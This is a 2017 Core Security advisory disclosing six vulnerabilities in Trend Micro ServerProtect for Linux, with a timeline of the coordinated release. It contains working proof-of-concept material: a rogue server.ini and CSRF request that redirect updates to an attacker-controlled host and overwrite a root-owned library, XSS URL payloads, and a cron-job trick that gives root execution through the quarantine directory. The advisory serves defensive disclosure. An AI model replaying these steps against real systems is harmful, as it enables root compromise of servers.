Trend Micro ServerProtect Disclosure / CSRF / XSS

`1. *Advisory Information*  
  
Title: Trend Micro ServerProtect Multiple Vulnerabilities  
Advisory ID: CORE-2017-0002  
Advisory URL:  
http://www.coresecurity.com/advisories/trend-micro-serverprotect-multiple-vulnerabilities  
Date published: 2017-05-23  
Date of last update: 2017-05-23  
Vendors contacted: Trend Micro  
Release mode: Coordinated release  
  
2. *Vulnerability Information*  
  
Class: Cleartext Transmission of Sensitive Information [CWE-319],  
Insufficient Verification of Data Authenticity [CWE-345], Cross-Site  
Request Forgery [CWE-352], Improper Neutralization of Input During Web  
Page Generation ('Cross-site Scripting') [CWE-79], Improper  
Neutralization of Input During Web Page Generation ('Cross-site  
Scripting') [CWE-79], External Control of File Name or Path [CWE-73]  
Impact: Code execution, Security bypass  
Remotely Exploitable: Yes  
Locally Exploitable: Yes  
CVE Name: CVE-2017-9035, CVE-2017-9034, CVE-2017-9033, CVE-2017-9037,  
CVE-2017-9032, CVE-2017-9036  
  
3. *Vulnerability Description*  
  
Trend Micro's website states that ServerProtect for Linux 3.0 [1] does  
"Protect against viruses, rootkits, and data-stealing malware while  
simplifying and automating security operations on servers and storage  
systems. This reliable solution from the market leader in server  
security offers real-time protection, high performance, and low  
processing overhead."  
  
Vulnerabilities were found in the ServerProtect for Linux update  
mechanism, allowing remote code execution as root. We present two  
vectors to achieve this: one via a man-in-the-middle attack and another  
one via exploiting vulnerabilities in the Web-based Management Console  
that is bundled with the product.  
  
4. *Vulnerable Packages*  
  
. Trend Micro ServerProtect for Linux 3.0-1061 with SP1 Patch 7  
(1.0-1505)  
Other products and versions might be affected, but they were not tested.  
  
5. *Vendor Information, Solutions and Workarounds*  
  
Trend Micro published the following Security Notes:  
. KB1117411 - https://success.trendmicro.com/solution/1117411  
  
6. *Credits*  
  
These vulnerabilities were discovered and researched by Leandro Barragan  
and Maximiliano Vidal from Core Security Consulting Services. The  
publication of this advisory was coordinated by Alberto Solino from  
Core Advisories Team.  
  
7. *Technical Description / Proof of Concept Code*  
  
Trend Micro ServerProtect for Linux uses an insecure update mechanism  
that allows an attacker to overwrite sensitive files, including  
binaries, and achieve remote code execution as root.  
  
The vulnerabilities presented in sections 7.1 and 7.2 are the core  
issue, and would allow an attacker in a man-in-the-middle position to  
gain root access.  
  
Another option exists for when a man-in-the-middle attack is not  
feasible. The Web-based Management Console includes functionality to  
specify alternative download sources. By exploiting vulnerabilities  
7.3, 7.4, or 7.5, an attacker would be able to set an arbitrary download  
source and trigger the vulnerable update mechanism.  
  
Also, a privilege escalation vulnerability is presented in section 7.6  
that allows a local user to run commands as root. This is achieved by  
abusing a functionality from the Web-based Management Console to set  
the quarantine directory to an arbitrary location.  
  
7.1. *Insecure Update via HTTP*  
  
[CVE-2017-9035]  
Communication to the update servers is unencrypted. The following  
request is generated when an administrator launches an update:  
  
/-----  
GET /activeupdate/ini_xml.zip HTTP/1.1  
Host: splx3-p.activeupdate.trendmicro.com:80  
User-Agent: Mozilla/4.0 (compatible;MSIE 5.0; Windows 98)  
Accept: */*  
Pragma: No-Cache  
Cache-Control: no-store, no-cache  
Connection: close  
X-Trend-ActiveUpdate: 2.85.0.1097  
  
-----/  
  
The zip contains a server.ini file that describes from where to download  
engine updates, signatures, etc., as well as some metadata of each file.  
Additional updates are also downloaded via HTTP by default.  
  
This means that the product does not do any kind of certificate  
validation or public key pinning, which makes it easier for an attacker  
to eavesdrop and tamper the data.  
  
7.2. *Unvalidated Software Updates*  
  
[CVE-2017-9034]  
Update packages are not signed or validated in any form other than  
matching the expected size described in the server.ini file.  
  
An attacker can overwrite sensitive files in the ServerProtect's  
directory, including shared libraries. Some interesting examples are  
the libvsapi.so and libaction.so files, which result in code execution  
in the context of the application, which is running as root.  
  
The following is a proof of concept to demonstrate the vulnerability:  
  
Create a zip archive with a copy of /bin/ls inside. For the example, we  
will call this file pepperoni.zip and rename the ls executable to the  
file we want to overwrite, which in this case is libvsapi.so.  
  
/-----  
$ md5sum /bin/ls  
c4e5f7fcbcef75924b2abde2b2e75f3f /bin/ls  
  
-----/  
  
The next step is to provide a malicious server.ini file with the  
correct size for the update:  
  
/-----  
[Server]  
AvailableServer=1  
Server.1=http://malicious-server  
  
[ENGINE]  
  
E.20000400=VSAPI_X64_LINUX,engine/pepperoni.zip,9.900.1111,57049,6.510.1002  
  
-----/  
  
The next time an update is launched, our file will be downloaded and  
the shared object library overwritten.  
  
/-----  
$ pwd  
/opt/TrendMicro/SProtectLinux  
$ ls -l libvsapi.so  
-r-x------. 1 root root 126584 mar 9 12:03 libvsapi.so  
$ sudo md5sum libvsapi.so  
c4e5f7fcbcef75924b2abde2b2e75f3f libvsapi.so  
  
-----/  
  
Replacing libvsapi.so with a malicious shared object file would result  
in command execution as root when the update process finishes or the  
API is accessed afterwards. Such payloads could include reverse shells,  
backdoor implants, etc.  
  
7.3. *Lack of Cross-Site Request Forgery Protection*  
  
[CVE-2017-9033]  
There are no Anti-CSRF tokens in any forms on the web interface. This  
would allow an attacker to submit authenticated requests when an  
authenticated user browses an attack-controlled domain.  
  
Proof of concept request to start an update from an arbitrary source:  
  
/-----  
POST /SProtectLinux/scanoption_set.cgi?id=Update_Manual HTTP/1.1  
Host: <server name>:14943  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0)  
Gecko/20100101 Firefox/51.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Referer: https://<server  
IP>:14943/SProtectLinux/scanoption.cgi?page=../html/Update/Update_Manual.htm  
Cookie:  
  
!CRYPTAA!Qt/gETGgy6CFP+CHi0CZtntYcGcNf7jEzyctWQBhApzX0OfFLSEsixs9IqWTpl5joTfY06TJt9/Y2l9HXHa8EQADe8C5A9AE64ef95C270C7D8666267F8!!  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 252  
  
  
C222=ON&C22=ON&C23=ON&C32=ON&source=V9&T119=http%3A%2F%2Frogueserver&B35=Update+now&id=ManualUpdateConfig&  
  
DoUpdateNow=1&tmLastConfigFileModifiedDate=&bOverWrite=true&bDirectlyUpdateNow=true&bLicenseViolate=&  
UpdateSrcName=Trend+Micro+ActiveUpdate+server  
  
-----/  
  
7.4. *Cross-Site Scripting in notification.cgi*  
  
[CVE-2017-9037]  
The following parameters of the notification.cgi script are vulnerable  
to cross-site-scripting: S44, S5, S_action_fail, S_ptn_update, T113,  
T114, T115, T117117, T118, T_action_fail, T_ptn_update, textarea,  
textfield5, tmLastConfigFileModifiedDate.  
  
The following is a proof of concept to demonstrate the vulnerability:  
  
/-----  
https://<server  
IP>:14943/SProtectLinux/notification.cgi?Scan_config3=ON&textfield5=100&D1=60&  
  
T114=[SPLX]+Security+risk+outbreak+subject&textarea=A+security+risk+outbreak+was+detected&  
  
Scan_config=ON&T115=[SPLX]+Security+risk+infection+subject&S2=Security+risk+infection(s)+detected&  
  
Scan_config4=ON&T116=[SPLX]+Real-time+scan+configuration+modified&S3=The+real-time+scan+configuration+  
  
was+modified&Scan_config5=ON&T117=[SPLX]+ServerProtect+was+started&S4=ServerProtect+was+started&  
  
Scan_config55=ON&T117117=[SPLX]+ServerProtect+was+stopped&S44=ServerProtect+was+stopped&  
  
Scan_config2=ON&T113=7&T118=[SPLX]+Pattern+file+is+outdated&S5=Pattern+file+is+outdated&  
  
CHK_ptn_update=ON&T_ptn_update=[SPLX]+Pattern+update+unsuccessful&S_ptn_update=Pattern+update+  
  
unsuccessful&CHK_action_fail=ON&T_action_fail=[SPLX]+Action+performed+on+malware+unsuccessful&  
  
S_action_fail=Action%20performed%20on%20malware%20unsuccessful%3C%2fscript%3E%3Cimg%20src%3da%20onerror%3d  
  
alert(1)%3E&B22=Save&page=Alerts.htm&action=save&tmLastConfigFileModifiedDate=123  
  
-----/  
  
7.5. *Cross-Site Scripting in log_management.cgi*  
  
[CVE-2017-9032]  
The T1 and tmLastConfigFileModifiedDate parameters of the  
log_management.cgi script are vulnerable to cross-site scripting.  
  
The following is a proof of concept to demonstrate the vulnerability:  
  
/-----  
https://<server  
IP>:14943/SProtectLinux/log_management.cgi?T1=%2fvar%2flog%2fTrendMicro%2fSProtectLinux%3c%2f  
  
script%3e%3cimg%20src%3da%20onerror%3dalert(1)%3et&B2=Save&Type=9&sCreateDirectoryIfNotExist=&  
goBackDoNotAsk=0&tmLastConfigFileModifiedDate=123  
  
-----/  
  
7.6. *Unrestricted quarantine directory could allow local privilege  
escalation*  
  
[CVE-2017-9036]  
The Web-based Management Console allows users to set the Quarantine  
directory to any location on the file system. An unauthenticated user  
could also change Quarantine directory settings by exploiting  
vulnerabilities 7.3, 7.4 or 7.5.  
  
Files flagged as suspicious by the scanner are then moved to that  
directory without changing its name.  
  
Quarantine files are owned by root and its permissions are changed to  
0600.  
This effectively allows a local user to write the file that is put in  
quarantine to an arbitrary location with root permissions, which could  
lead to privilege escalation.  
  
Being able to write to the file system as root opens the door to several  
privilege escalation vectors on Linux machines. In this PoC we present  
one vector which consist on creating a cron job on /etc/cron.d  
directory:  
  
Change Quarantine directory to /etc/cron.d by visiting the following  
URL:  
  
/-----  
https://<server  
IP>:14943/SProtectLinux/scanoption_set.cgi?T1=%2Fetc%2Fcron.d&id=QuarantineSettings&  
  
page=QuarantineDirectory&sCreateDirectoryIfNotExist=&goBackDoNotAsk=0&tmLastConfigFileModifiedDate=&  
bOverWrite=true  
  
-----/  
  
Place the binary you want to run on /tmp/test, this could be a reverse  
shell or any other binary. Place the following file anywhere on /home:  
  
/-----  
* * * * * root /tmp/test  
#{{EICAR.COM string content from  
http://www.eicar.org/download/eicar.com}}  
  
-----/  
  
(Please note that we removed EICAR file content in order to avoid this  
advisory to be flagged as virus)  
  
During the next scan, that file will be flagged as a virus (it contains  
EICAR test file as part of it), and it will be written by root to the  
directory we have chosen as the Quarantine directory, effectively  
placing it on /etc/cron.d. When the cron job gets triggered, /tmp/test  
is executed as root.  
  
8. *Report Timeline*  
2017-03-14: Core Security sent an initial notification to Trend Micro,  
including a draft advisory.  
2017-03-14: Trend Micro confirmed reception of advisory and informed  
they will submit it to the relevant technical team for validation and  
replication.  
2017-04-03: Core Security asked Trend Micro if they were able to review  
and verify the reported issues. Core Security additionally requested an  
estimate date for releasing the fix/update.  
2017-04-03: Trend Micro confirmed they could reproduce all  
vulnerabilities reported. They are working on a fix and cannot confirm  
ETA due to the need to pass through several processes and QA to ensure  
the accuracy of the solution.  
2017-04-24: Core Security asked TrendMicro for an update on the status  
of the fixes for the reported vulnerabilities.  
2017-04-25: Trend Micro reported the patches are composed but still in  
progress of localizing the build for other regions. They are planning  
on publishing a security advisory and asked to agree on a release date.  
2017-04-25: Core Security proposed disclosure date to be May 22nd. Also  
asked for assigned CVE numbers.  
2017-04-25: Trend Micro said they will review their timeline and define  
a more concrete release date. They also said they have their own  
vulnerability identifiers and are not using CVE-ID.  
2017-04-26: Core Security asked for their vulnerability identifiers so  
we can include them in our advisory.  
2017-04-28: Trend Micro said they will share the security IDs once  
ready. Also asked for the researcher's names for proper attribution.  
2017-05-08: Core Security researchers found out a Critical Patch dated  
April 14th covering 5 out of the 6 vulnerabilities reported already  
published. Core Security asked for immediate clarification on the issue.  
017-05-09: Trend Micro acknowledged they published the patch and said  
they didn't issue an advisory yet since there is still one vulnerability  
to fix and they still need to translate the patch description to other  
languages. Trend Micro apologized for the confusion.  
2017-05-10: Core Security confirmed reception of message, stating being  
still in disagreement with the way the process was handled. Core  
Security also asked status on remaining vulnerability to assess the  
need to split the advisory in two.  
2017-05-16: Trend Micro confirmed they have a fix available for the  
remaining vulnerability and asked the publication date to be May 23rd.  
2017-05-16: Core Security accepted target publication date and sent the  
researchers' names for proper attribution. Core Security informed our  
advisory will be published May 23rd at noon time EST.  
2017-05-16: Trend Micro thanked us for accepting the date change and  
also asked for the CVE numbers to include in their advisory.  
2017-05-18: Core Security sent the assigned CVE numbers for each  
vulnerability. Reminded Trend Micro to send their advisory ID for these  
issues in order to include it in our final advisory.  
2017-05-22: Trend Micro sent their advisory ID (KB1117411) and final  
link.  
2017-05-23: Advisory CORE-2017-0002 published.  
  
9. *References*  
  
[1]  
http://apac.trendmicro.com/apac/enterprise/cloud-solutions/server-protection/.  
  
10. *About CoreLabs*  
  
CoreLabs, the research center of Core Security, is charged with  
anticipating the future needs and requirements for information security  
technologies.  
We conduct our research in several important areas of computer security  
including system vulnerabilities, cyber attack planning and simulation,  
source code auditing, and cryptography. Our results include problem  
formalization, identification of vulnerabilities, novel solutions and  
prototypes for new technologies. CoreLabs regularly publishes security  
advisories, technical papers, project information and shared software  
tools for public use at: http://corelabs.coresecurity.com.  
  
11. *About Core Security*  
  
Core Security provides companies with the security insight they need to  
know who, how, and what is vulnerable in their organization. The  
company's threat-aware, identity & access, network security, and  
vulnerability management solutions provide actionable insight and  
context needed to manage security risks across the enterprise. This  
shared insight gives customers a comprehensive view of their security  
posture to make better security remediation decisions. Better insight  
allows organizations to prioritize their efforts to protect critical  
assets, take action sooner to mitigate access risk, and react faster  
if a breach does occur.  
  
Core Security is headquartered in the USA with offices and operations in  
South America, Europe, Middle East and Asia. To learn more, contact Core  
Security at (678) 304-4500 or [email protected].  
  
12. *Disclaimer*  
  
The contents of this advisory are copyright (c) 2017 Core Security  
and (c) 2017 CoreLabs, and are licensed under a Creative Commons  
Attribution Non-Commercial Share-Alike 3.0 (United States) License:  
http://creativecommons.org/licenses/by-nc-sa/3.0/us/  
  
`